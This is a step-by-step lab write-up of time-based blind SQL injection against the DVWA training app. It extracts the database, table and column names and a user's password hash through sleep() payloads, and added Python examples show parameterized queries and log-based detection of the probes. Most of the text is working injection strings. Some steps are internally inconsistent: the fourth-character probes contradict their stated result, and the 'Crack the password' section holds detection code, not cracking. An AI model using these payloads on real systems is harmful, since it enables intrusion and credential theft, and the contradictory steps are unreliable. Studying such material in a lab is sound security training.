- Purpose:
Time-based blind SQL injection: obtain the password of the user Smithy from the users table.
- Setup:
In the Windows 10 virtual machine, open XAMPP and start Apache and MySQL. Open the DVWA site in a browser and log in, click "DVWA Security" in the menu and set the security level to Low.
- Steps:
- Identify the injection point
An injection point exists.
- Determine the injection type
Known: the injection type is either numeric or string.
- Numeric
1 and sleep(5) ----- no page delay
- String
1' and sleep(5)# ----- page delays
Conclusion: the injection is string-based (the value is wrapped in single quotes, so a quote is needed to break out of it).
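Why the quoted payload above changes the query while the numeric one does not: at the Low level the id parameter is concatenated into the SQL text inside single quotes. The following is an added example (Python with SQLite, not DVWA's PHP source) that contrasts that concatenation with a parameterized query. SQLite has no sleep() function, so a boolean condition stands in for the page's timing condition, and `--` is used in place of MySQL's `#` comment; the table contents are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed sample data, not DVWA's real schema or rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "hash-a"), (2, "smithy", "hash-s")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # Mirrors the Low-level pattern: the untrusted value becomes part of the
    # SQL text, so a quote in it ends the literal and the rest is parsed as SQL.
    query = f"SELECT user FROM users WHERE id = '{user_id}'"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn, user_id):
    # The SQL text is fixed; the value is bound as data and can never
    # change the structure of the statement.
    query = "SELECT user FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(query, (user_id,))]


def compare():
    """Run the same three inputs through both code paths."""
    inputs = ["1", "1' and 1=1 -- ", "1' and 1=2 -- "]
    return {
        value: (lookup_vulnerable(make_db(), value),
                lookup_parameterized(make_db(), value))
        for value in inputs
    }


if __name__ == "__main__":
    for value, (vuln, safe) in compare().items():
        print(f"{value!r:22} concatenated={vuln} parameterized={safe}")
```

The concatenated path returns a row for `1' and 1=1 -- ` and nothing for `1' and 1=2 -- `, which is exactly the true/false oracle the rest of this write-up relies on (with sleep(5) as the signal instead of the result set). The parameterized path returns nothing for either injected string because the whole value is compared against the id column as one literal.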
- Obtain the database name
- Obtain the length of the database name
1' and if(length(database())=4,sleep(5),1)# ----- page delays
Conclusion: the database name is 4 characters long.
- Guess each character
- First character
1' and if(ascii(substr(database(),1,1))>96,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),1,1))>106,sleep(5),1)# ----- no page delay
1' and if(ascii(substr(database(),1,1))<101,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),1,1))<99,sleep(5),1)# ----- no page delay
1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)# ----- page delays; from the ASCII table, 100 is d
Conclusion: the first character is d.
- Second character
1' and if(ascii(substr(database(),2,1))>96,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),2,1))>106,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),2,1))>116,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),2,1))<122,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),2,1))<119,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),2,1))=118,sleep(5),1)# ----- page delays; from the ASCII table, 118 is v
Conclusion: the second character is v.
- Third character
1' and if(ascii(substr(database(),3,1))>96,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),3,1))>106,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),3,1))>116,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),3,1))<122,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),3,1))<119,sleep(5),1)# ----- no page delay
1' and if(ascii(substr(database(),3,1))=119,sleep(5),1)# ----- page delays; from the ASCII table, 119 is w
Conclusion: the third character is w.
- Fourth character
1' and if(ascii(substr(database(),4,1))>96,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),4,1))>106,sleep(5),1)# ----- no page delay
1' and if(ascii(substr(database(),4,1))<101,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),4,1))<97,sleep(5),1)# ----- page delays
1' and if(ascii(substr(database(),4,1))=97,sleep(5),1)# ----- no page delay
1' and if(ascii(substr(database(),4,1))=96,sleep(5),1)# ----- page delays; from the ASCII table, the character is a
Conclusion: the fourth character is a.
Putting it together: the database name is dvwa.
- Obtain the table name
Known: the users table is the second row of information_schema.tables for this database.
- Obtain the number of tables in the database
1' and if((select count(table_name) from information_schema.tables where table_schema='dvwa')=2,sleep(5),1)# ----- page delays
Conclusion: the database has two tables.
- Fetch the record of the second table
select table_name from information_schema.tables where table_schema='dvwa' limit 1,1
- Take the full string of the second table name
substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1)
- Obtain the length of the second table name
1' and if(length(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1))=5,sleep(5),1)# ----- page delays (the table is known to be users, which is 5 characters long)
- Guess each character of the table name
- First character
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),1,1))=117,sleep(5),1)# ----- page delays; from the ASCII table, 117 is u
- Second character
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),2,1))=115,sleep(5),1)# ----- page delays; from the ASCII table, 115 is s
- Third character
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),3,1))=101,sleep(5),1)# ----- page delays; from the ASCII table, 101 is e
- Fourth character
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),4,1))=114,sleep(5),1)# ----- page delays; from the ASCII table, 114 is r
- Fifth character
1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),5,1))=115,sleep(5),1)# ----- page delays; from the ASCII table, 115 is s
Putting it together: the table name is users.
5. Obtain the column name
- Obtain the number of columns in the users table
1' and if((select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users')=8,sleep(5),1)#
- Obtain the length of the 5th column name
1' and if(length(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),1))=8,sleep(5),1)#
- Guess each character of the 5th column name
- First character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),1,1))=112,sleep(5),1)# ----- page delays; from the ASCII table, 112 is p
- Second character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),2,1))=97,sleep(5),1)# ----- page delays; from the ASCII table, 97 is a
- Third character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),3,1))=115,sleep(5),1)# ----- page delays; from the ASCII table, 115 is s
- Fourth character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),4,1))=115,sleep(5),1)# ----- page delays; from the ASCII table, 115 is s
- Fifth character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),5,1))=119,sleep(5),1)# ----- page delays; from the ASCII table, 119 is w
- Sixth character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),6,1))=111,sleep(5),1)# ----- page delays; from the ASCII table, 111 is o
- Seventh character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),7,1))=114,sleep(5),1)# ----- page delays; from the ASCII table, 114 is r
- Eighth character
1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema='dvwa' limit 4,1),8,1))=100,sleep(5),1)# ----- page delays; from the ASCII table, 100 is d
Putting it together: the column name is password.
6. Obtain the data
Known: Smithy is in row 5.
- Obtain the number of records
1' and if((select count(password) from dvwa.users)=5,sleep(5),1)# ----- page delays, so there are 5 records
- Obtain the length of the 5th record
1' and if(length(substr((select password from dvwa.users limit 4,1),1))=32,sleep(5),1)# ----- page delays, so the value is 32 characters long
- Guess each character
- First character
1' and if(ascii(substr((select password from dvwa.users limit 4,1),1,1))<65,sleep(5),1)# ----- page delays; not a letter
1' and if(ascii(substr((select password from dvwa.users limit 4,1),1,1))<58,sleep(5),1)# ----- page delays; not a symbol
1' and if(ascii(substr((select password from dvwa.users limit 4,1),1,1))>47,sleep(5),1)# ----- page delays; a digit
1' and if(ascii(substr((select password from dvwa.users limit 4,1),1,1))>53,sleep(5),1)# ----- no page delay
1' and if(ascii(substr((select password from dvwa.users limit 4,1),1,1))=53,sleep(5),1)# ----- page delays; the digit 5
- Second character
1' and if(ascii(substr((select password from dvwa.users limit 4,1),2,1))<65,sleep(5),1)# ----- no page delay; not a digit
1' and if(ascii(substr((select password from dvwa.users limit 4,1),2,1))>96,sleep(5),1)# ----- page delays; a lowercase letter
1' and if(ascii(substr((select password from dvwa.users limit 4,1),2,1))>106,sleep(5),1)# ----- no page delay
1' and if(ascii(substr((select password from dvwa.users limit 4,1),2,1))>102,sleep(5),1)# ----- no page delay
1' and if(ascii(substr((select password from dvwa.users limit 4,1),2,1))=102,sleep(5),1)# ----- page delays; f
Continuing in the same way for the remaining characters gives the password 5f4dcc3b5aa765d61d8327deb882cf99
7. Crack the password
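Every probe in this write-up leaves two traces on the server side: a `sleep(` call in the decoded query string, and a response that takes about five seconds instead of milliseconds. The following added example (not part of the original write-up) parses constructed Apache access-log lines that carry the request duration in microseconds (the `%D` directive appended to the LogFormat) and flags requests that show either trace. The log lines, IP addresses and the 3-second threshold are all assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines: Apache "combined" format with the request
# duration in microseconds (%D) appended. Not taken from a real host.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:10:01:01 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit HTTP/1.1" 200 4312 "-" "Mozilla/5.0" 18234
10.0.0.5 - - [12/Mar/2024:10:01:07 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+sleep%285%29%23&Submit=Submit HTTP/1.1" 200 4312 "-" "Mozilla/5.0" 5021877
10.0.0.5 - - [12/Mar/2024:10:01:15 +0000] "GET /dvwa/vulnerabilities/sqli_blind/?id=1%27+and+if%28length%28database%28%29%29%3D4%2Csleep%285%29%2C1%29%23&Submit=Submit HTTP/1.1" 200 4312 "-" "Mozilla/5.0" 5018455
10.0.0.9 - - [12/Mar/2024:10:02:00 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1877 "-" "Mozilla/5.0" 9871
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "[^"]*" (?P<micros>\d+)$'
)

# MySQL time-delay primitives used by time-based probes.
DELAY_FUNC = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)
# Assumed threshold: this endpoint normally answers in milliseconds.
SLOW_MICROS = 3_000_000


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["micros"] = int(entry["micros"])
    # Decode %27, %28, '+' and friends so the pattern sees the SQL as sent.
    entry["path"] = unquote_plus(entry["path"])
    return entry


def flag_entries(log_text):
    """Return (ip, decoded path, reasons) for every suspicious request."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = []
        if DELAY_FUNC.search(entry["path"]):
            reasons.append("time-delay function in request")
        if entry["micros"] >= SLOW_MICROS:
            reasons.append("slow response")
        if reasons:
            findings.append((entry["ip"], entry["path"], reasons))
    return findings


def count_by_ip(findings):
    """Number of flagged requests per client, to spot a sustained probing run."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = flag_entries(SAMPLE_LOG)
    for ip, path, reasons in hits:
        print(ip, ", ".join(reasons), path, sep=" | ")
    print(count_by_ip(hits))
```

Matching on the decoded path matters because the browser sends `1' and sleep(5)#` as `1%27+and+sleep%285%29%23`; a pattern applied to the raw line would miss it. The two signals are deliberately independent: the delay function catches the probe even when the condition is false (no slow response), and the duration catches obfuscated payloads that the pattern does not recognise.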